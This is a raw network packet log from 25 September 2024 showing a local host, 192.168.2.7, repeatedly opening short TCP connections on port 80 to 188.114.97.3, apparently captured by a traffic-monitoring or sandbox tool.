Sep 25, 2024 10:19:50.846054077 CEST	49750	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.851042032 CEST	80	49750	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:50.851104021 CEST	49750	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.853298903 CEST	49750	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.858089924 CEST	80	49750	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:50.858143091 CEST	49750	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:51.172909975 CEST	49750	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:51.210522890 CEST	80	49750	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:51.210558891 CEST	80	49750	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:51.507719040 CEST	80	49750	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:51.507811069 CEST	80	49750	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:51.507839918 CEST	49750	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:51.507873058 CEST	49750	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:51.512658119 CEST	80	49750	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:51.644330978 CEST	49751	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:51.650954008 CEST	80	49751	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:51.651196003 CEST	49751	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:51.653358936 CEST	49751	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:51.659730911 CEST	80	49751	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:51.659792900 CEST	49751	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:51.665824890 CEST	80	49751	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:52.349291086 CEST	80	49751	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:52.350276947 CEST	80	49751	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:52.350336075 CEST	49751	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:52.351116896 CEST	49751	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:52.356086016 CEST	80	49751	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:52.621645927 CEST	49752	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:52.627418995 CEST	80	49752	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:52.627491951 CEST	49752	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:52.629637957 CEST	49752	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:52.634536028 CEST	80	49752	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:52.634584904 CEST	49752	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:52.639468908 CEST	80	49752	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:53.355499029 CEST	80	49752	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:53.355659008 CEST	49752	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:53.355894089 CEST	80	49752	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:53.355947018 CEST	49752	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:53.360531092 CEST	80	49752	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:53.510644913 CEST	49753	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:53.515615940 CEST	80	49753	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:53.515698910 CEST	49753	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:53.518424034 CEST	49753	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:53.523278952 CEST	80	49753	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:53.523329020 CEST	49753	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:53.528107882 CEST	80	49753	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:54.186008930 CEST	80	49753	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:54.186674118 CEST	80	49753	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:54.186779976 CEST	49753	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:54.186830997 CEST	49753	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:54.191773891 CEST	80	49753	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:54.332768917 CEST	49754	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:54.528970003 CEST	80	49754	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:54.529104948 CEST	49754	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:54.531418085 CEST	49754	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:54.536341906 CEST	80	49754	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:54.536452055 CEST	49754	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:54.541207075 CEST	80	49754	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:55.325730085 CEST	80	49754	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:55.325745106 CEST	80	49754	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:55.325753927 CEST	80	49754	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:55.325978041 CEST	49754	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:55.326045036 CEST	49754	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:55.331029892 CEST	80	49754	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:55.473229885 CEST	49755	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:55.478171110 CEST	80	49755	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:55.478317022 CEST	49755	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:55.480483055 CEST	49755	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:55.485536098 CEST	80	49755	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:55.485677958 CEST	49755	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:55.490452051 CEST	80	49755	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:56.126749992 CEST	80	49755	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:56.126948118 CEST	49755	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:56.127538919 CEST	80	49755	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:56.127618074 CEST	49755	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:56.131912947 CEST	80	49755	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:56.279055119 CEST	49756	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:56.284313917 CEST	80	49756	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:56.284413099 CEST	49756	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:56.296606064 CEST	49756	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:56.301561117 CEST	80	49756	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:56.301649094 CEST	49756	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:56.306524992 CEST	80	49756	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:57.009186983 CEST	80	49756	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:57.009360075 CEST	49756	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:57.009994984 CEST	80	49756	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:57.010046005 CEST	49756	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:57.014225960 CEST	80	49756	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:57.160433054 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:57.165360928 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:57.165451050 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:57.167869091 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:57.172713995 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:57.172763109 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:57.177618027 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:58.849462032 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:58.849488020 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:58.849551916 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:58.849605083 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:58.849621058 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:58.849646091 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:58.849661112 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:58.849693060 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:58.849971056 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:58.850013018 CEST	49757	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:58.854919910 CEST	80	49757	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:58.988655090 CEST	49758	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:58.993724108 CEST	80	49758	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:58.993856907 CEST	49758	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:58.995986938 CEST	49758	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:59.000869036 CEST	80	49758	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:59.000978947 CEST	49758	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:59.005748034 CEST	80	49758	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:59.725168943 CEST	80	49758	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:59.726007938 CEST	80	49758	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:59.726090908 CEST	49758	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:59.731724977 CEST	49758	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:59.736725092 CEST	80	49758	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:59.879787922 CEST	49759	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:59.884758949 CEST	80	49759	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:59.884875059 CEST	49759	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:59.886976004 CEST	49759	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:59.891834021 CEST	80	49759	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:59.891904116 CEST	49759	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:59.896770954 CEST	80	49759	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:00.560081959 CEST	80	49759	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:00.560306072 CEST	49759	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:00.560571909 CEST	80	49759	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:00.560626030 CEST	49759	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:00.565087080 CEST	80	49759	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:00.707006931 CEST	49760	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:00.711896896 CEST	80	49760	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:00.712003946 CEST	49760	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:00.714145899 CEST	49760	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:00.718899012 CEST	80	49760	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:00.718977928 CEST	49760	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:00.723732948 CEST	80	49760	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:01.361571074 CEST	80	49760	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:01.361670971 CEST	49760	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:01.361841917 CEST	80	49760	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:01.361877918 CEST	49760	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:01.366739988 CEST	80	49760	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:01.512365103 CEST	49761	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:01.517683029 CEST	80	49761	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:01.517771006 CEST	49761	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:01.519893885 CEST	49761	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:01.526101112 CEST	80	49761	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:01.526168108 CEST	49761	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:01.532051086 CEST	80	49761	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:02.228873014 CEST	80	49761	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:02.229063034 CEST	49761	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:02.229166031 CEST	80	49761	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:02.229209900 CEST	49761	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:02.233937979 CEST	80	49761	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:02.379710913 CEST	49763	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:02.384671926 CEST	80	49763	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:02.384795904 CEST	49763	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:02.387046099 CEST	49763	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:02.391973972 CEST	80	49763	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:02.392071009 CEST	49763	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:02.396989107 CEST	80	49763	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.088596106 CEST	80	49763	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.088731050 CEST	49763	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:03.089360952 CEST	80	49763	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.089406967 CEST	49763	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:03.093667030 CEST	80	49763	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.245127916 CEST	49764	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:03.250097990 CEST	80	49764	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.250168085 CEST	49764	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:03.252350092 CEST	49764	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:03.257210016 CEST	80	49764	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.257255077 CEST	49764	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:03.262145996 CEST	80	49764	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.904649973 CEST	80	49764	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.904946089 CEST	49764	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:03.905018091 CEST	80	49764	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:03.905067921 CEST	49764	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:03.909832001 CEST	80	49764	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:04.054486990 CEST	49765	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:04.059503078 CEST	80	49765	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:04.063270092 CEST	49765	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:04.065716028 CEST	49765	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:04.070597887 CEST	80	49765	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:04.071219921 CEST	49765	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:04.076034069 CEST	80	49765	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:04.881788015 CEST	80	49765	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:04.881977081 CEST	49765	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:04.883076906 CEST	80	49765	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:04.883135080 CEST	49765	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:04.887902975 CEST	80	49765	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.018069983 CEST	49766	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.023005009 CEST	80	49766	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.023112059 CEST	49766	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.025248051 CEST	49766	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.030035973 CEST	80	49766	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.030103922 CEST	49766	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.034945011 CEST	80	49766	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.709095001 CEST	80	49766	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.709217072 CEST	80	49766	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.709216118 CEST	49766	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.709268093 CEST	49766	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.714461088 CEST	80	49766	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.846661091 CEST	49767	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.851612091 CEST	80	49767	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.851725101 CEST	49767	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.853837013 CEST	49767	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.858674049 CEST	80	49767	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:05.858736992 CEST	49767	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:05.863581896 CEST	80	49767	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:06.566374063 CEST	80	49767	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:06.566708088 CEST	80	49767	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:06.566812992 CEST	49767	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:06.566813946 CEST	49767	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:06.571759939 CEST	80	49767	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:06.706192970 CEST	49768	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:06.711157084 CEST	80	49768	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:06.711266994 CEST	49768	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:06.713376999 CEST	49768	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:06.718154907 CEST	80	49768	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:06.718238115 CEST	49768	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:06.723077059 CEST	80	49768	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:07.429567099 CEST	80	49768	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:07.429641962 CEST	80	49768	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:07.429764986 CEST	49768	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:07.429879904 CEST	49768	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:07.434670925 CEST	80	49768	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:07.570648909 CEST	49769	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:07.575587034 CEST	80	49769	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:07.575809956 CEST	49769	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:07.577991962 CEST	49769	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:07.582880974 CEST	80	49769	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:07.582940102 CEST	49769	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:07.587753057 CEST	80	49769	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:09.278275013 CEST	80	49769	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:09.278625965 CEST	80	49769	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:09.278626919 CEST	49769	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:09.278669119 CEST	49769	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:09.283550978 CEST	80	49769	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:09.429056883 CEST	49770	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:09.434104919 CEST	80	49770	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:09.434235096 CEST	49770	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:09.436377048 CEST	49770	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:09.443525076 CEST	80	49770	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:09.443638086 CEST	49770	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:09.448575974 CEST	80	49770	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:10.191735029 CEST	80	49770	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:10.191854954 CEST	49770	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:10.192042112 CEST	80	49770	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:10.192092896 CEST	49770	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:10.196688890 CEST	80	49770	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:10.331124067 CEST	49771	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:10.336486101 CEST	80	49771	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:10.336575031 CEST	49771	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:10.338665962 CEST	49771	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:10.343506098 CEST	80	49771	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:10.343573093 CEST	49771	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:10.348541975 CEST	80	49771	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.008219957 CEST	80	49771	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.008414984 CEST	49771	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.008714914 CEST	80	49771	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.008768082 CEST	49771	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.013287067 CEST	80	49771	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.150048971 CEST	49772	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.154956102 CEST	80	49772	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.155062914 CEST	49772	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.157373905 CEST	49772	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.162230015 CEST	80	49772	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.162336111 CEST	49772	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.167224884 CEST	80	49772	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.812237024 CEST	80	49772	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.812458038 CEST	80	49772	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.812479973 CEST	49772	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.812525988 CEST	49772	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.817332029 CEST	80	49772	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.960190058 CEST	49773	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.965177059 CEST	80	49773	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.965255022 CEST	49773	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.967433929 CEST	49773	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.972373009 CEST	80	49773	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:11.972431898 CEST	49773	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:11.977355957 CEST	80	49773	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:12.630415916 CEST	80	49773	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:12.630592108 CEST	80	49773	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:12.630620956 CEST	49773	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:12.630645037 CEST	49773	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:12.635415077 CEST	80	49773	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:12.771414042 CEST	49774	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:12.776397943 CEST	80	49774	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:12.776544094 CEST	49774	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:12.779400110 CEST	49774	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:12.784241915 CEST	80	49774	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:12.784342051 CEST	49774	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:12.789169073 CEST	80	49774	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:13.435775995 CEST	80	49774	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:13.435959101 CEST	49774	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:13.436019897 CEST	80	49774	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:13.436069012 CEST	49774	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:13.440851927 CEST	80	49774	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:13.586915970 CEST	49775	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:13.591902018 CEST	80	49775	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:13.592026949 CEST	49775	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:13.595252991 CEST	49775	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:13.600229025 CEST	80	49775	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:13.600308895 CEST	49775	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:13.605127096 CEST	80	49775	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:14.236275911 CEST	80	49775	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:14.236381054 CEST	49775	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:14.236537933 CEST	80	49775	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:14.236587048 CEST	49775	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:14.241223097 CEST	80	49775	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:14.379278898 CEST	49776	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:14.384449959 CEST	80	49776	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:14.384556055 CEST	49776	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:14.386653900 CEST	49776	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:14.393145084 CEST	80	49776	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:14.393220901 CEST	49776	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:14.398009062 CEST	80	49776	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.051773071 CEST	80	49776	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.051934958 CEST	49776	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:15.053304911 CEST	80	49776	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.053354979 CEST	49776	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:15.056809902 CEST	80	49776	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.190659046 CEST	49777	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:15.196909904 CEST	80	49777	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.197025061 CEST	49777	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:15.199145079 CEST	49777	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:15.203991890 CEST	80	49777	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.204070091 CEST	49777	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:15.209012032 CEST	80	49777	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.897368908 CEST	80	49777	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.897466898 CEST	49777	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:15.897752047 CEST	80	49777	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:15.897797108 CEST	49777	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:15.902726889 CEST	80	49777	188.114.97.3	192.168.2.7
